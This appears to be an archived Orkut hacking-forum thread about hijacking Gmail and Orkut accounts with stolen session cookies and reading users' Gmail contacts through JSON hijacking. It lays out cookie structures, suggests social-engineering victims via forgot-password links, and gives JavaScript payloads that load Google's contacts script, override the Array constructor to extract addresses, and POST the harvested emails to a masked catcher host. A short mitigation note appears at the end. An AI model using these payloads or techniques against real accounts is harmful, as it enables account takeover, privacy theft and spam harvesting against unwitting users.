(no name) | Jun 16 (2 days ago) | Today I found a special thing. Before, we were able to access a Gmail account from the Orkut cookie, but then the bug was fixed. But today I found a special thing to log in to a Gmail account: you can create the Gmail cookie by getting some more data for the cookie with a little modification of the Orkut cookie-stealing script. I have not tried it, but I am sure it can be used for IE also. So, start your experimentation. HINT: .www.orkut.com. Happy hacking.
(no name) | Jun 16 (2 days ago) | Warning: don't hack anyone, just try all the tricks on your fake profiles. Hacking is a bad thing, so don't hack anyone. Don't hack innocent people. The data above is provided just to share knowledge.
(no name) | Jun 16 (2 days ago) | Is it true?
Sid | Jun 16 (2 days ago) | Explain it please.
Anonymous | Jun 16 (2 days ago) | Hmmm, never tried this before... let me check. The Orkut cookie has 6 parts; the Gmail cookie has 17 parts (although most of the parts remain the same for all users).
Orkut cookie structure:
ORKUTPREF=ID=[Profile ID]:INF=0:SET=:LNG=1:CNT=91:RM=0:USR=[Base64 of your email]:PHS=:TS=:LCL=en-US:NET=1:TOS=:GC=[Base64 of SID]:PE=[Base64 of your email]:GT1=1:GID:[Again base64 of email]:S=[base64 of some data]
Gmail cookie structure: [don't know]
Hmmm... now what's the next step????
Mr Nobody here
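A parser for the ORKUTPREF layout quoted in the post above, written as an added example for this page (it is not code from the thread or from Orkut). It splits the colon-separated fields and base64-decodes the ones the post says carry the email and the SID, which makes the practical point visible: base64 is an encoding, not a secret, so anyone holding the cookie can read the account identity out of it. The field list follows the post; the cookie value, email and SID are constructed samples, and the `GID:` form (colon instead of `=`) is reproduced exactly as the post wrote it so the parser has to tolerate it.

```javascript
// Added example: parse an ORKUTPREF cookie as described in the thread.
// Field names follow the post; all values below are constructed samples.
const BASE64_FIELDS = new Set(["USR", "GC", "PE", "GID", "S"]);

function b64(s) {
  return Buffer.from(s, "utf8").toString("base64");
}

// Constructed sample cookie (not real data). "GID:" is kept as the post wrote it.
const SAMPLE_COOKIE =
  "ORKUTPREF=ID=1234567890:INF=0:SET=:LNG=1:CNT=91:RM=0" +
  ":USR=" + b64("alice@example.com") +
  ":PHS=:TS=:LCL=en-US:NET=1:TOS=" +
  ":GC=" + b64("SAMPLE-SID-VALUE") +
  ":PE=" + b64("alice@example.com") +
  ":GT1=1:GID:" + b64("alice@example.com") +
  ":S=" + b64("opaque-data");

// Returns { name, fields (raw), decoded (base64 fields decoded to text) }.
function parseOrkutPref(cookie) {
  const eq = cookie.indexOf("=");
  const name = cookie.slice(0, eq);
  const value = cookie.slice(eq + 1);
  const fields = {};
  let pending = null; // set when a token like "GID" arrives without "="
  for (const part of value.split(":")) {
    if (pending !== null) {        // previous token was "KEY" alone: this token is its value
      fields[pending] = part;
      pending = null;
      continue;
    }
    const i = part.indexOf("=");
    if (i === -1) { pending = part; continue; }
    fields[part.slice(0, i)] = part.slice(i + 1);
  }
  const decoded = {};
  for (const [k, v] of Object.entries(fields)) {
    decoded[k] = BASE64_FIELDS.has(k) && v !== ""
      ? Buffer.from(v, "base64").toString("utf8")
      : v;
  }
  return { name, fields, decoded };
}

function main() {
  const r = parseOrkutPref(SAMPLE_COOKIE);
  console.log("cookie:", r.name);
  console.log("email (USR):", r.decoded.USR, " SID (GC):", r.decoded.GC);
}
main();
```

Run with `node`; the decoded USR/PE/GID fields come back as the plain email address and GC as the plain session identifier, which is exactly why a stolen cookie is enough to identify (and, as the thread discusses, impersonate) the account.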
Anonymous | Jun 16 (2 days ago) | I think in Gmail we have everything except for the PREF value and the GX value... am I right??? Mr Nobody here
Sid | Jun 16 (2 days ago) | @ALL http://www.orkut.com/CommMsgs.aspx?
Bad sectors | Jun 16 (2 days ago) | We can find the GX value from the Orkut cookie.
Hugσ яαƒαєl ●๋• | Jun 16 (2 days ago) | Hmm, it does make sense, but if you have someone's Gmail cookie you can easily sign in to his Orkut. I've done that through some link which checks your Gmail cookie and carries you to an Orkut page.
*Anas!=] | Jun 17 (20 hours ago) | Explain please.
(no name) | Jun 17 (20 hours ago) | Hugσ яαƒαєl ●๋•, your English is quite good.
Anonymous | Jun 17 (20 hours ago) | ^^^ Forget the English... tell me how to move forward. Nobody here. uid=7033552749200404104, this is my temp profile.
*Anas!=] | Jun 17 (20 hours ago) | Yeah, same question. Please tell us about the cookies.
Anonymous | Jun 17 (19 hours ago) | @Mr. Nobody: for most profiles using Gmail or Yahoo you really don't need cookies to open them... Orkut and the forgot-password link will be your biggest help in opening these accounts... man, this is called social engineering. Try it.
Hugσ яαƒαєl ●๋• | Jun 18 (18 hours ago) | "Hugσ яαƒαєl ●๋•, your English is quite good" - you joking? -.- Well, if you use Firefox, download the plugin called "Tamper Data" and sign in on Orkut; the URL I told you about will appear.
Hugσ яαƒαєl ●๋• | Jun 18 (18 hours ago) | rememberme=true; PREF=ID=:TM=1180740125:LM=1181236785:GM= (that's a Google cookie example). If you have one, log on with it, then go to www.orkut.com, and that's the link: https://www.google.com/accounts/CheckCoo
Anonymous | 10:28 am (9 hours ago) | This is what a Gmail cookie looks like: __utma=173272373.631576527.1182142063.11 (I changed a few values to protect users' privacy.)
Anonymous | 10:48 am (8 hours ago) | A simple Gmail hack. Google, as we all know, uses a JSON interface relying completely on cookies. So a simple malicious piece of code can steal any private data, for example your entire contact list; this happens because Google stores this contact list data in a JSP file. The attack works on all the Java-enabled browsers: IE, FF and Opera... the list continues. It can be exploited by writing a callback function in JavaScript that can do anything, and then passing it to the above link, which gives your function all the user's contact info. It's a problem with web services that comes from an assumption that JavaScript cross-domain security is in place. The problem occurs at 2 points:
1) When you rely on cookies to perform the implicit authentication that reveals the data.
2) When you allow rendering of the data in JSON, which bypasses JavaScript cross-domain security.
Here's the super simple explanation of the above process:
1. Gmail sets a cookie saying you're logged in.
2. A [3rd party] JavaScript tells you to call Google's script.
3. Google checks for the Gmail cookie.
4. The cookie is valid.
5. Google hands over the requested data to you.
If [3rd party] wanted to keep your contact list, the JavaScript would pass it to a form and your computer would happily upload the list to [3rd party]'s server. At no point does [3rd party] make any request to Google.
A simple JavaScript to verify this hack will be provided if the mods find this place safe enough for public disclosure of such hacks...
Anonymous | 11:30 am (8 hours ago) | Sure buddy... I think you must continue... this place is perfect to share new hacking stuff, as it is apart from stupid stuff such as games, chats etc. I have requested the owner to make it moderated and change its name to OUG - Stealth Mode, or if not, just remove the OUG tag and share awesome stuff here.
Anonymous | 11:42 am (7 hours ago) | WTF, great stuff posted here. Orkut deleted Pritul and the person who posted the stuff. Orkut is spying on us. Nobody here. uid=7033552749200404104, this is my temp profile.
I am | 11:51 am (7 hours ago) | Damn, Orkut deleted me again... and guys, I know this ain't Orkut... this is an idiotic Brazilian.
☜ ☩ ∝ ⇔ ☤ ☥ ☮ ☏✡ | 12:10 pm (7 hours ago) | Lol... whoever that is, let him keep on deleting, let's see how many times. I guess it's easier for me to make a new profile than for him to delete mine. Go on. Pritul
☜ ☩ ∝ ⇔ ☤ ☥ ☮ ☏✡ | 12:31 pm (7 hours ago) | I am... please continue with your JavaScript. We are waiting. Pritul
I am | 1:22 pm (6 hours ago) |
<html>
<head>
<script>
// Callback invoked by the contacts script: a = { Body: { Contacts: [ { Email: ... }, ... ] } }
function google(a) {
  document.write("<ol>");
  for (var i = 0; i < a.Body.Contacts.length; i++) {
    document.write("<li>" + a.Body.Contacts[i].Email + "</li>");
  }
  document.write("</ol>");
}
</script>
<!-- the script src URL is truncated on the page -->
<script src="http://docs.google.com/data/contac"></script>
</head>
<body>
Hello
</body>
</html>
I am | 1:24 pm (6 hours ago) | There is a Google URL that returns some script containing your contacts: http://docs.google.com/data/contacts?ou (truncated on the page). This page was used in the script too. PS: this page no longer exists. You'll have to search yourself for the moved version. The page used to look something like this:
google({
  Success: true,
  Errors: [],
  Body: {
    AuthToken: { Value: '********' },
    Contacts: [
      {
        Id: '***',
        Email: 'users at dwr.dev.java.net',
        Affinity: ***,
        Groups: [ { id: '^Freq', value: 'users at dwr.dev.java.net' } ],
        Addressess: [],
        Phoness: [],
        Imss: []
      },
      // Lots more contacts here
    ]
  }
})
I am | 1:26 pm (6 hours ago) | So we're calling a function "google()" and passing it a data structure that includes all your contacts. So all we need to do is something with this data. The page I linked to earlier creates a list from it using code like this:
<script type="text/javascript">
// Callback named in the contacts script; data.Body.Contacts is the contact array
function google(data) {
  var emails = "", i;
  for (i = 0; i < data.Body.Contacts.length; i++) {
    emails += "<li>" + data.Body.Contacts[i].Email + "</li>";
  }
  document.write("<ol>" + emails + "</ol>");
}
</script>
<!-- the script src URL is truncated on the page -->
<script type="text/javascript" src="http://docs.google.com/data/contac"></script>
I am | 1:28 pm (6 hours ago) | But it would be just as easy to post the list of addresses off to some spam address-catcher service:
<script type="text/javascript">
function google(data) {
  var body = "", i;
  for (i = 0; i < data.Body.Contacts.length; i++) {
    body += data.Body.Contacts[i].Email + "\n";
  }
  // Microsoft.XMLHTTP is the IE-only object; other browsers use XMLHttpRequest
  var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
  // the catcher host is masked on the page
  xhr.open("POST", "http://****.***/catcher");
  xhr.send(body);
}
</script>
I am | 1:44 pm (5 hours ago) | Explanation for the dummies: http://mail.google.com/mail/?view=page& (truncated on the page). Clicking on this link will return the anonymous array of your email contacts. One thing you'll notice is a conspicuous while loop at the top of the array. Now a command activating a Google function can be run from a cross domain without actually requiring a Google authentication to read your contact list. This is well known as a CSRF (Cross-Site Request Forgery) attack.
I am | 1:52 pm (5 hours ago) | Attack details
1) Email a Gmail account a link and click. Example: http://foo/index.html
2) HTML of http://foo/index.html. The single line of HTML below forces the web browser to automatically send an off-domain HTTP request to Gmail. If the victim is logged in (obviously the case when you email a Gmail account), the session cookies will be sent along with the request, and the response contains the contact list. The URL was predictable across all users.
Page URL: http://foo/index.html
<*script src="http://mail.google.com/mail/?_url_ (truncated on the page)
3) Sample content of http://mail.google.com/mail/?_url_scrub (truncated on the page). The JavaScript line below contains an unreferenced array constant with your contact list of email addresses.
[["ct","Your Name","foo@gmail.com"],
 ["ct","Another Name","bar@gmail.com"]]
Gmail normally sends an XmlHttpRequest (XHR) to get this data on the fly, where it's then eval'ed in the browser and assigned to a variable. However, in our case the constant is loaded into JavaScript space on http://foo/index.html using a script tag, so it's never assigned to a variable. This means accessing the data requires something more.
I am | 1:53 pm (5 hours ago) | 4) Accessing the contact list. When JavaScript parses and interprets the unreferenced array, the Array constructor is called. It's possible to overwrite the internal Array constructor with our own to access the contact list. The new Array constructor uses setters to trigger events, then parses out the data we want, and prints the data to screen.
var table = document.createElement('table');
table.id = 'content';
table.cellPadding = 3;
table.cellSpacing = 1;
table.border = 0;

// Replacement Array constructor: each element the engine stores into the
// literal goes through getNext, which re-arms a setter on the next index.
function Array() {
  var obj = this;
  var ind = 0;
  var getNext;
  getNext = function(x) {
    // "prop setter = fn" is the legacy SpiderMonkey (old Firefox) setter syntax
    obj[ind++] setter = getNext;
    if (x) {
      var str = x.toString();
      // keep only address strings: skip the "ct" tag and the nested arrays
      if ((str != 'ct') && (typeof x != 'object') && (str.match(/@/))) {
        var row = table.insertRow(-1);
        var td = row.insertCell(-1);
        td.innerHTML = str;
      }
    }
  };
  this[ind++] setter = getNext;
}

function readGMail() {
  document.body.appendChild(table);
}
I am | 1:53 pm (5 hours ago) | Moral of the story: don't put sensitive data in pure JavaScript files. Wrap HTML tags around the data to protect it from script tags.
If JavaScript files must contain sensitive information, make the URL unpredictable.
And/or...
Make sure the file cannot be accessed by anything with an off-domain referer.
Vijay | 7:45 pm (11 minutes ago) | Very nice discussion going on... I really didn't know that Google's security is so vulnerable that websites can acquire sensitive private data by querying URLs. AFAIK, these URLs can be obtained by crunching client-side code.
I think blocking requests based on Referer may be the only solution to this, or browsers need to be upgraded to take care that cookie information is not passed along while loading website Y from the HTML/JS source of website X.
I am delighted to see such a nice discussion going on here.